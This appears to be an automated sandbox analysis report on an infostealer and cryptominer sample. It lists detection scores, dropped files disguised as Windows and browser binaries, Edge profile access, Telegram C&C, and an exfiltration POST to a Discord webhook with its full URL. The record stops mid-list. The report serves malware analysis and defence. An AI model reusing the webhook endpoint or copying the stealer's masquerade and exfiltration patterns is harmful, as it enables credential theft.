Source: C:\Recovery\powershell.exe	ReversingLabs: Detection: 91%
Source: C:\Recovery\winlogon.exe	ReversingLabs: Detection: 91%
Source: C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp	ReversingLabs: Detection: 91%

Multi AV Scanner detection for submitted file

Source: VaTlw2kNGc.exe

ReversingLabs: Detection: 47%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Machine Learning detection for dropped file

Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	Joe Sandbox ML: detected
Source: C:\Recovery\winlogon.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\svchost.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Microsoft\hacn.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Google\Chrome\updater.exe	Joe Sandbox ML: detected
Source: C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\setup.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Mozilla Firefox\dwm.exe	Joe Sandbox ML: detected
Source: C:\Recovery\powershell.exe	Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Directory created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Directory created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\21b1a557fd31cc
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Directory created: C:\Program Files\Mozilla Firefox\dwm.exe
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Directory created: C:\Program Files\Mozilla Firefox\6cb0b6c459d5d3

Source: VaTlw2kNGc.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Build.exe, 00000004.00000000.1711609232.0000000000956000.00000002.00000001.01000000.00000006.sdmp, Build.exe, 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmp, s.exe, 0000000B.00000003.1750025071.0000000007689000.00000004.00000020.00020000.00000000.sdmp, s.exe, 0000000B.00000000.1741603424.0000000000663000.00000002.00000001.01000000.00000014.sdmp, s.exe, 0000000B.00000002.1764006617.0000000000663000.00000002.00000001.01000000.00000014.sdmp, svchost.exe, 0000000C.00000002.1767211934.0000000000913000.00000002.00000001.01000000.0000001B.sdmp, svchost.exe, 0000000C.00000003.1760108075.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000000.1758798682.0000000000913000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\select.pdb source: based.exe, 00000008.00000002.2653255671.00007FFE130C1000.00000040.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbMM source: based.exe, 00000008.00000002.2642370223.00007FFE126EB000.00000040.00000001.01000000.00000015.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb source: based.exe, 00000008.00000002.2587870470.00007FFDFF191000.00000040.00000001.01000000.00000018.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_sqlite3.pdb source: based.exe, 00000008.00000002.2632791212.00007FFE11ED1000.00000040.00000001.01000000.00000017.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: based.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\libssl-1_1.pdb source: based.exe, based.exe, 00000008.00000002.2509833770.00007FFDFB705000.00000040.00000001.01000000.0000001E.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\python310.pdb source: based.exe, 00000008.00000002.2433044590.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: based.exe, 00000008.00000002.2661087553.00007FFE13301000.00000040.00000001.01000000.00000016.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: based.exe, 00000008.00000002.2532291858.00007FFDFB99F000.00000040.00000001.01000000.0000001D.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: based.exe, 00000008.00000002.2647849411.00007FFE12E11000.00000040.00000001.01000000.00000021.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb source: based.exe, 00000008.00000002.2610651844.00007FFE11501000.00000040.00000001.01000000.0000001C.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: based.exe, 00000008.00000002.2601619118.00007FFE10301000.00000040.00000001.01000000.00000020.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: based.exe, 00000008.00000002.2642370223.00007FFE126EB000.00000040.00000001.01000000.00000015.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: based.exe, 00000008.00000002.2532291858.00007FFDFB99F000.00000040.00000001.01000000.0000001D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: VaTlw2kNGc.exe, 00000000.00000003.1701216930.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmp, hacn.exe, 00000005.00000003.1725096795.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1725774568.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000002.1751685629.00007FFE13311000.00000002.00000001.01000000.0000000F.sdmp, based.exe, 00000008.00000002.2660929046.00007FFE13241000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb source: based.exe, 00000008.00000002.2657823913.00007FFE13201000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: based.exe, 00000008.00000002.2509833770.00007FFDFB705000.00000040.00000001.01000000.0000001E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python310.pdb source: hacn.exe, 00000007.00000002.1750856272.00007FFDFB78F000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: based.exe, 00000008.00000002.2625141523.00007FFE11EB1000.00000040.00000001.01000000.00000019.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: based.exe, 00000008.00000002.2481464532.00007FFDFB67C000.00000040.00000001.01000000.00000022.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: based.exe, based.exe, 00000008.00000002.2532291858.00007FFDFBA21000.00000040.00000001.01000000.0000001D.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

System file written: C:\Windows\System32\SecurityHealthSystray.exe

Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691A79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF7691A79B0
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691A85A0 FindFirstFileExW,FindClose,	0_2_00007FF7691A85A0
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691C0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF7691C0B84
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691A85A0 FindFirstFileExW,FindClose,	1_2_00007FF7691A85A0
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691A79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	1_2_00007FF7691A79B0
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691C0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00007FF7691C0B84
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_0092C4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	4_2_0092C4A8
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_0093E560 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	4_2_0093E560
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692987F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	5_2_00007FF692987F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692978B00 FindFirstFileExW,FindClose,	5_2_00007FF692978B00
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692991FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	5_2_00007FF692991FE4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692987F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	5_2_00007FF692987F4C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00000202B6E2DCE0 FindFirstFileExW,	6_2_00000202B6E2DCE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D15479B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	6_2_00007FF7D15479B0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D15485A0 FindFirstFileExW,FindClose,	6_2_00007FF7D15485A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D1560B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	6_2_00007FF7D1560B84
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00000273EE64DCE0 FindFirstFileExW,	8_2_00000273EE64DCE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D15485A0 FindFirstFileExW,FindClose,	8_2_00007FF7D15485A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D15479B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	8_2_00007FF7D15479B0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D1560B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	8_2_00007FF7D1560B84

Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def	Jump to behavior

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 162.159.138.232 162.159.138.232

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown

DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.2

Source: based.exe, 00000008.00000002.2381451502.00000273EDC74000.00000004.00001000.00020000.00000000.sdmp

String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: discord.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2tsN2CAivzv3lJ-Ow3IUya HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 693785User-Agent: python-urllib3/2.2.2Content-Type: multipart/form-data; boundary=720bf38bf17272696e0e8c38b6636f8d

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 01 Aug 2024 22:08:04 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=86a67c90505211efa91f02a2205ccffc; Expires=Tue, 31-Jul-2029 22:08:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1722550086x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2CBDsglSGZFtmEeHZSaZpu0gKvclv57NsKn2ouq5Wvr%2BKbHhBPUdkKEAjfq36xufpoUjuGflx4Jvyl4mSQSjQ0AG3EvGLr1mEG3nt1AYH%2BJeKO6517B2wOimkuVI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=86a67c90505211efa91f02a2205ccffc9478c4367cc9c36b457f84c079b54cecf5426fcf88478aa68b98437576e030a4; Expires=Tue, 31-Jul-2029 22:08:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=b3a25f467d6e14d2f5864b2062409193ec70586a-1722550084; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None

Source: hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.co
Source: hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.coH
Source: VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1734194548.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: hacn.exe, 00000005.00000003.1725591841.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF7385F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1734194548.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: VaTlw2kNGc.exe, 00000000.00000003.1703132629.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702643091.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701573415.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701344521.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701653066.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701766609.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701443369.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725591841.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF7385F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727769666.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: VaTlw2kNGc.exe, 00000000.00000003.1703132629.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702643091.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701573415.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701344521.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A3D000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701653066.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701766609.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701443369.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725591841.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727175401.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727769666.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1726964644.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: VaTlw2kNGc.exe, 00000000.00000003.1703132629.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702643091.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701573415.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701344521.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A3D000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701653066.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701766609.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701443369.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725591841.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1753005958.000001BF73860000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727175401.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: based.exe, 00000006.00000003.1727769666.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Digi
